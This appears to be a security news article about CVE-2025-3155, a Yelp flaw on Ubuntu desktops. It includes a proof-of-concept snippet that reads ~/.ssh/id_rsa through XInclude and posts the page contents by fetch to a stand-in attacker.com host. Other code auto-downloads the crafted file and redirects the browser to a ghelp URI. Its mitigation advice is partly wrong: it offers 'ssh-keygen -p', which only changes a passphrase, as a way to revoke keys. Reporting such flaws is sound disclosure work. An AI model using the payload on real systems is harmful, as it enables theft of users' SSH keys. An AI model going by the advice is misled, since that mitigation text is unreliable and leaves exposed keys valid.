PoC Exploit Reveals SSH Key Exposure via Yelp Vulnerability on Ubuntu

Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.

The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.

Technical Breakdown of CVE-2025-3155

Affected Systems:

- Advertisement -

• Ubuntu 22.04 LTS and earlier desktop editions
• Yelp versions ≤ 42.1
• GNOME WebKitGTK components

Vulnerability Chain:

1. URI Scheme Handling: Yelp registers as the default handler for ghelp:// URIs
2. XInclude Exploitation: Mallard documentation format allows arbitrary file inclusion via:

<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>

3. SVG Script Injection: XSLT processing permits script execution through SVG tags:

<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>

Attack Scenario Walkthrough

1. Attacker hosts malicious webpage with automatic download of crafted .page file
2. Victim visits page triggering download to ~/Downloads folder
3. Browser redirect triggers ghelp:///proc/self/cwd/Downloads URI
4. Yelp processes malicious XML with:
   • File inclusion of ~/.ssh/id_rsa
   • Embedded SVG script exfiltrating data via HTTP POST

Key Exploit Code Snippet:

<script>

let payloadPage = `<?xml...>

  <include href="/proc/self/cwd/.ssh/id_rsa"/>

  <svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;

function exp() {

  const blob = new Blob([payloadPage], {type: 'text/plain'});

  const a = document.createElement('a');

  a.href = URL.createObjectURL(blob);

  a.download = 'index.page';

  a.click();

  location = 'ghelp:///proc/self/cwd/Downloads';

}

</script>

Mitigation and Response

1. Update systems with:
   sudo apt update && sudo apt upgrade yelp
2. Revoke SSH keys with:
   ssh-keygen -p -f ~/.ssh/id_rsa
3. Avoid opening unexpected documentation files

Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.

This vulnerability demonstrates three critical risks:

1. Privilege Escalation: From basic document viewing to system file access
2. Persistence Risk: Stolen SSH keys enable lateral network movement
3. Phishing Vector: Requires minimal user interaction (single click)

Security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”

Ongoing investigations continue to determine if this vulnerability was exploited in wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!